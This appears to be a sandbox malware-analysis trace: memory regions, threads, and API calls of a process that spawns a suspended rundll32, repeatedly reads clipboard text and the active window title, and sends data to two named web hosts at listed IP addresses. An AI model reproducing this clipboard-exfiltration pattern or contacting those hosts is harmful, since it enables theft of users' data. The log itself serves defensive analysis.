"\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1127 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1128 start_va = 0x7ffb5ec40000 end_va = 0x7ffb5ec94fff monitored = 0 entry_point = 0x7ffb5ec57970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1129 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1130 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1131 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1132 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1133 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1134 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1135 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1136 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1137 start_va = 0x7ffb60c90000 end_va = 0x7ffb60cfefff monitored = 0 entry_point = 0x7ffb60cb5f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1138 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1139 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1140 start_va = 0x7ffb60eb0000 end_va = 0x7ffb612d8fff monitored = 0 entry_point = 0x7ffb60ed8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1141 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1142 start_va = 0x7ffb61430000 end_va = 0x7ffb61589fff monitored = 0 entry_point = 0x7ffb614738e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1143 start_va = 0x7ffb61590000 end_va = 0x7ffb61597fff monitored = 0 entry_point = 0x7ffb61591ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1144 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1145 start_va = 0x7ffb615e0000 end_va = 0x7ffb61686fff monitored = 0 entry_point = 0x7ffb615eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1146 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1147 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1148 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1149 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1150 start_va = 0x7ffb61a30000 end_va = 0x7ffb61a9afff monitored = 0 entry_point = 0x7ffb61a490c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1151 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1152 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1179 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1183 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1184 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1185 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1186 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1187 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1188 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1189 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1190 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1200 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1278 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1279 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1322 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1374 start_va = 0x10c80000 end_va = 0x127d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010c80000" filename = "" Region: id = 1375 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1376 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1377 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1378 start_va = 0x8eb0000 end_va = 0x8f90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008eb0000" filename = "" Region: id = 1380 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1381 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1382 start_va = 0x127e0000 end_va = 0x1285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127e0000" filename = "" Region: id = 1383 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1384 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1385 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1386 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1387 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1388 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1389 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1390 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1391 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1392 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1393 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1394 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1397 start_va = 0x410000 end_va = 0x429fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000001b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000001b.db") Region: id = 1398 start_va = 0x7ffb56b10000 end_va = 0x7ffb56b76fff monitored = 0 entry_point = 0x7ffb56b163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1399 start_va = 0xf4a0000 end_va = 0xf99afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4a0000" filename = "" Region: id = 2912 start_va = 0x7ffb53e30000 end_va = 0x7ffb53ed2fff monitored = 0 entry_point = 0x7ffb53e44810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 2969 start_va = 0x12860000 end_va = 0x128dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012860000" filename = "" Region: id = 2970 start_va = 0x128e0000 end_va = 0x1295ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000128e0000" filename = "" Region: id = 2977 start_va = 0x7ffb48310000 end_va = 0x7ffb483abfff monitored = 0 entry_point = 0x7ffb483696a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 2978 start_va = 0x12960000 end_va = 0x129dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012960000" filename = "" Region: id = 2985 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2986 start_va = 0x129e0000 end_va = 0x12a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129e0000" filename = "" Region: id = 2987 start_va = 0x12ae0000 end_va = 0x12b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ae0000" filename = "" Region: id = 17570 start_va = 0x7ffb51250000 end_va = 0x7ffb513edfff monitored = 0 entry_point = 0x7ffb51255480 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 17748 start_va = 0x7ffb56bf0000 end_va = 0x7ffb56c1efff monitored = 0 entry_point = 0x7ffb56c03620 region_type = mapped_file name = "mtxoci.dll" filename = "\\Windows\\System32\\mtxoci.dll" (normalized: "c:\\windows\\system32\\mtxoci.dll") Region: id = 17750 start_va = 0x7ffb5d880000 end_va = 0x7ffb5d8b3fff monitored = 0 entry_point = 0x7ffb5d89ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 17752 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 18177 start_va = 0x430000 end_va = 0x434fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 18178 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 18183 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 18184 start_va = 0x12c60000 end_va = 0x12cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c60000" filename = "" Region: id = 18185 start_va = 0x450000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 18186 start_va = 0xa0d0000 end_va = 0xa5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0d0000" filename = "" Region: id = 18189 start_va = 0xa5d0000 end_va = 0xaac1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a5d0000" filename = "" Region: id = 18190 start_va = 0x12ce0000 end_va = 0x12d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ce0000" filename = "" Region: id = 18191 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 18192 start_va = 0x12d60000 end_va = 0x12ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012d60000" filename = "" Region: id = 18193 start_va = 0x12de0000 end_va = 0x12e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012de0000" filename = "" Region: id = 18194 start_va = 0x7ffb542f0000 end_va = 0x7ffb54320fff monitored = 0 entry_point = 0x7ffb54307820 region_type = mapped_file name = "shutdownux.dll" filename = "\\Windows\\System32\\shutdownux.dll" (normalized: "c:\\windows\\system32\\shutdownux.dll") Region: id = 18195 start_va = 0x12e60000 end_va = 0x12edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012e60000" filename = "" Region: id = 18196 start_va = 0x7ffb43fb0000 end_va = 0x7ffb43fbdfff monitored = 0 entry_point = 0x7ffb43fb1da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18197 start_va = 0x2860000 end_va = 0x2955fff monitored = 0 entry_point = 0x2861840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 18198 start_va = 0x12ee0000 end_va = 0x12f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ee0000" filename = "" Region: id = 18199 start_va = 0x2860000 end_va = 0x2955fff monitored = 0 entry_point = 0x2861840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 18200 start_va = 0x450000 end_va = 0x450fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 18205 start_va = 0x2740000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 18206 start_va = 0x450000 end_va = 0x452fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shutdownux.dll.mui" filename = "\\Windows\\System32\\en-US\\ShutdownUX.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shutdownux.dll.mui") Region: id = 18211 start_va = 0x2860000 end_va = 0x28f9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 18212 start_va = 0x440000 end_va = 0x442fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 18213 start_va = 0x2900000 end_va = 0x2923fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 18214 start_va = 0x2930000 end_va = 0x2951fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 18215 start_va = 0x12f60000 end_va = 0x12fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f60000" filename = "" Region: id = 18216 start_va = 0x12fe0000 end_va = 0x1305ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012fe0000" filename = "" Region: id = 18219 start_va = 0x13060000 end_va = 0x130dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013060000" filename = "" Region: id = 18297 start_va = 0x2740000 end_va = 0x2761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 18298 start_va = 0x2860000 end_va = 0x2881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 18299 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 33 os_tid = 0xf80 Thread: id = 34 os_tid = 0xf00 Thread: id = 35 os_tid = 0xef8 Thread: id = 36 os_tid = 0x1268 Thread: id = 37 os_tid = 0xd44 Thread: id = 38 os_tid = 0x4d4 Thread: id = 39 os_tid = 0xad4 Thread: id = 40 os_tid = 0x288 Thread: id = 41 os_tid = 0x7ec Thread: id = 42 os_tid = 0x3c4 Thread: id = 43 os_tid = 0x51c Thread: id = 44 os_tid = 0x3c0 Thread: id = 45 os_tid = 0x124 Thread: id = 46 os_tid = 0xbf0 Thread: id = 47 os_tid = 0xbec Thread: id = 48 os_tid = 0xbe8 Thread: id = 49 os_tid = 0xbe4 Thread: id = 50 os_tid = 0xbe0 Thread: id = 51 os_tid = 0xbd0 Thread: id = 52 os_tid = 0xbcc Thread: id = 53 os_tid = 0xb58 Thread: id = 54 os_tid = 0xaf8 Thread: id = 55 os_tid = 0x608 Thread: id = 56 os_tid = 0x7d0 Thread: id = 57 os_tid = 0x7cc Thread: id = 58 os_tid = 0x780 Thread: id = 59 os_tid = 0x768 Thread: id = 60 os_tid = 0x764 Thread: id = 61 os_tid = 0x760 Thread: id = 62 os_tid = 0x754 Thread: id = 63 os_tid = 0x72c Thread: id = 64 os_tid = 0x718 Thread: id = 65 os_tid = 0x678 Thread: id = 66 os_tid = 0x65c Thread: id = 67 os_tid = 0x658 Thread: id = 68 os_tid = 0x654 Thread: id = 69 os_tid = 0x650 Thread: id = 70 os_tid = 0x64c Thread: id = 71 os_tid = 0x644 Thread: id = 72 os_tid = 0x640 Thread: id = 73 os_tid = 0x63c Thread: id = 74 os_tid = 0x630 Thread: id = 75 os_tid = 0x620 Thread: id = 76 os_tid = 0x61c Thread: id = 77 os_tid = 0x618 Thread: id = 78 os_tid = 0x5d8 Thread: id = 79 os_tid = 0x5d4 [0178.526] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\rundll32.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcf928*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcf900, hNewToken=0x0 | out: lpProcessInformation=0xcf900*(hProcess=0x2008, hThread=0x2014, dwProcessId=0xf98, dwThreadId=0xf9c), hNewToken=0x0) returned 1 [0193.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x570000) returned 0x6 [0193.976] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3da0) returned 0xb2935f0 [0193.988] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf380 | out: Value="RDhJ0CNFevzX") returned 0x0 [0194.030] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x570000) returned 0x6 [0194.038] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0xb01b690 [0194.055] LdrGetProcedureAddress (in: BaseAddress=0x7ffb612e0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffb5f0b1540) returned 0x0 [0194.058] LdrGetProcedureAddress (in: BaseAddress=0x7ffb612e0000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffb5f0b2c50) returned 0x0 [0194.060] LdrGetProcedureAddress (in: BaseAddress=0x7ffb612e0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffb5f0efb70) returned 0x0 [0194.105] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf100 | out: Value="RDhJ0CNFevzX") returned 0x0 [0194.127] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xcf400 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0194.200] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xcf3de, cbSize=0xcf3b0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xcf3b0) returned 0x0 [0194.334] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xcf7b0 | out: lpWSAData=0xcf7b0) returned 0 [0194.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8f0b7d5, lpParameter=0x8f10636, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2160 Thread: id = 88 os_tid = 0xa78 [0194.363] Sleep (dwMilliseconds=0x1388) [0199.541] OpenClipboard (hWndNewOwner=0x0) returned 1 [0199.541] GetClipboardData (uFormat=0xd) returned 0xafaa230 [0199.542] GlobalLock (hMem=0xafaa230) returned 0xafaa230 [0199.549] GetForegroundWindow () returned 0x2013a [0199.549] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0199.569] GlobalUnlock (hMem=0xafaa230) returned 1 [0199.569] CloseClipboard () returned 1 [0199.608] socket (af=2, type=1, protocol=6) returned 0x2270 [0199.612] getaddrinfo (in: pNodeName="www.distressedthenblessed.com", pServiceName="80", pHints=0xb293638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293668 | out: ppResult=0xb293668*=0x84a6d80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269e10*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), ai_next=0x0)) returned 0 [0200.169] htons (hostshort=0x50) returned 0x5000 [0200.169] connect (s=0x2270, name=0xb269e10*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), namelen=16) returned 0 [0200.329] RtlIntegerToChar (in: Value=0x14d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="333") returned 0x0 [0200.329] send (s=0x2270, buf=0x8f1cf22*, len=771, flags=0) returned 771 [0200.330] closesocket (s=0x2270) returned 0 [0200.332] socket (af=2, type=1, protocol=6) returned 0x2270 [0200.332] connect (s=0x2270, name=0xb269e10*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), namelen=16) returned 0 [0200.477] send (s=0x2270, buf=0x8f3a322*, len=184, flags=0) returned 184 [0200.477] setsockopt (s=0x2270, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0200.477] recv (in: s=0x2270, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 869 [0200.708] closesocket (s=0x2270) returned 0 [0200.709] Sleep (dwMilliseconds=0x1388) [0205.709] OpenClipboard (hWndNewOwner=0x0) returned 1 [0205.711] GetClipboardData (uFormat=0xd) returned 0xafaa500 [0205.712] GlobalLock (hMem=0xafaa500) returned 0xafaa500 [0205.712] GlobalUnlock (hMem=0xafaa500) returned 1 [0205.712] CloseClipboard () returned 1 [0205.712] socket (af=2, type=1, protocol=6) returned 0x2350 [0205.712] getaddrinfo (in: pNodeName="www.cannabeeswax.com", pServiceName="80", pHints=0xb2939d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293a08 | out: ppResult=0xb293a08*=0xaf825f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269f30*(sa_family=2, sin_port=0x50, sin_addr="199.34.228.171"), ai_next=0x0)) returned 0 [0205.846] connect (s=0x2350, name=0xb269f30*(sa_family=2, sin_port=0x50, sin_addr="199.34.228.171"), namelen=16) returned 0 